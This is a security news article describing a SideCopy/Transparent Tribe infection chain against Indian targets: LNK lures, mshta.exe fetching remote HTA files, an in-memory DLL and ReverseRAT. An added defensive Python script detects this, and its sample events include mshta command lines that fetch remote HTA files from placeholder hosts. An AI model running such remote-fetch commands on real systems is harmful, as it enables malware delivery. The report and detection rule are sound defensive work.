
URL: https://securityonline.info/transparent-tribe-sidecopy-a-dangerous-cyber-alliance-targeting-india/
Submission: On May 17 via api from IN — Scanned from DE
TRANSPARENT TRIBE & SIDECOPY: A DANGEROUS CYBER ALLIANCE TARGETING INDIA

by do son · May 16, 2024



In a recent analysis, Cyble Research and Intelligence Labs (CRIL) has uncovered
alarming developments involving two Advanced Persistent Threat (APT) groups,
Transparent Tribe (APT36) and SideCopy. These threat actors are employing
sophisticated and overlapping cyber strategies to target India, posing
significant risks to both public and private sectors.

In the first week of May, CRIL identified a malicious website associated with
the SideCopy APT group. This website hosted a file named “files.zip,” containing
three directories: “economy,” “it,” and “survey.” The “survey” directory was
found to contain lure files similar to those used in previous campaigns, while
the other two directories remain undisclosed.

SideCopy’s malicious website | Image: CRIL

Upon further investigation, CRIL uncovered the use of malicious LNK files in the
SideCopy malware campaign. These files, once executed, trigger a series of
commands leading to the deployment of malware. The infection starts with a spam
email, prompting the download of a ZIP file containing an LNK file disguised as
a document. When executed, this file initiates the launch of “mshta.exe” to
connect to a malicious URL and download an HTA file, which further executes a
malicious DLL.
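The chain described above has a detection-friendly pivot point: a double-clicked LNK launching "mshta.exe" with a remote URL on its command line. The script below is an added example, not code from the article or from CRIL; it runs a simple rule over constructed Sysmon-style process-creation events (JSON lines with Image, ParentImage and CommandLine fields, all sample values invented here) and flags mshta.exe invocations that carry an http(s) URL, noting when the parent is explorer.exe, which is what a user opening a shortcut looks like.

```python
import json
import re
from typing import Dict, Iterable, List, Optional

# Constructed sample events in a Sysmon-like "process create" shape.
# Paths, hosts and URLs are invented for this example; none come from the CRIL report.
SAMPLE_EVENTS = [
    # 1. User double-clicks a shortcut: explorer.exe spawns mshta.exe with a remote HTA URL.
    r'{"EventID":1,"Image":"C:\\Windows\\System32\\mshta.exe",'
    r'"ParentImage":"C:\\Windows\\explorer.exe",'
    r'"CommandLine":"mshta.exe https://lure.example.invalid/survey/update.hta"}',
    # 2. Legitimate local HTA launched by an installer: no remote URL, should not fire.
    r'{"EventID":1,"Image":"C:\\Windows\\System32\\mshta.exe",'
    r'"ParentImage":"C:\\Program Files\\Vendor\\setup.exe",'
    r'"CommandLine":"mshta.exe \"C:\\Program Files\\Vendor\\help.hta\""}',
    # 3. Ordinary cmd.exe from explorer: not mshta, should not fire.
    r'{"EventID":1,"Image":"C:\\Windows\\System32\\cmd.exe",'
    r'"ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"cmd.exe /c dir"}',
    # 4. mshta.exe with a remote URL but launched from an Office process: still fires.
    r'{"EventID":1,"Image":"C:\\Windows\\System32\\mshta.exe",'
    r'"ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",'
    r'"CommandLine":"mshta http://203.0.113.10/it/report.hta"}',
    # 5. Malformed line, as real log pipelines sometimes produce; must be skipped, not crash.
    '{"EventID":1,"Image":"C:\\\\Windows\\\\System32\\\\mshta.exe", "CommandLine": ',
]

# Only plain http/https URLs are matched; scheme-obfuscated variants are out of scope here.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def analyse_event(event: Dict) -> Optional[Dict]:
    """Return a finding for an mshta.exe launch that fetches a remote URL, else None."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\mshta.exe"):
        return None
    match = URL_RE.search(event.get("CommandLine", ""))
    if not match:
        return None  # local .hta file or inline script: not this rule's concern
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    reasons = ["mshta.exe invoked with a remote URL"]
    if parent == "explorer.exe":
        reasons.append("parent is explorer.exe, consistent with a double-clicked LNK")
    return {"url": match.group(0), "parent": parent, "reasons": reasons}


def scan(lines: Iterable[str]) -> List[Dict]:
    """Parse JSON-lines events and collect findings; unparsable lines are skipped."""
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        hit = analyse_event(event)
        if hit is not None:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {finding['url']} (parent: {finding['parent']}) - "
              + "; ".join(finding["reasons"]))
```

The rule deliberately ignores mshta.exe runs against local files so that vendor help pages do not generate noise; in a real deployment the same check would be expressed as a SIEM query over the process-creation event source rather than run over a list in memory.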

The HTA file concatenates embedded Base64-encoded strings, decodes them, and
writes the resulting content into memory as a malicious DLL named
“PreBotHTta.dll.” This DLL uses ActiveX objects for dynamic method invocation to
execute its payload, which includes decoding and decompressing additional
malicious content.

Infection chain | Image: CRIL

The malware then downloads a text file from a specified URL, saves it as
“newFile.txt,” and utilizes it for further malicious activities. Depending on
the installed antivirus software, different execution paths are followed. For
instance, if Kaspersky AV is detected, the malware drops additional HTA and
batch files to maintain persistence. Similar methods are employed for systems
with other antivirus software, ensuring the malware remains active and
undetected.

In some cases, the malware deploys ReverseRAT, a Remote Access Trojan that
continuously performs malicious activities such as data exfiltration and
system monitoring. This RAT adapts its behavior based on the installed antivirus
software, showcasing the attackers’ adaptability and sophistication.

The SideCopy APT group, operating as a subgroup of Transparent Tribe, presents a
significant threat due to their advanced and coordinated attack vectors. Their
ability to deploy versatile malware like ReverseRAT and Action RAT underscores
the need for robust and flexible cybersecurity defenses.

Tags: APT group, APT36, SideCopy, SideCopy APT group, Transparent Tribe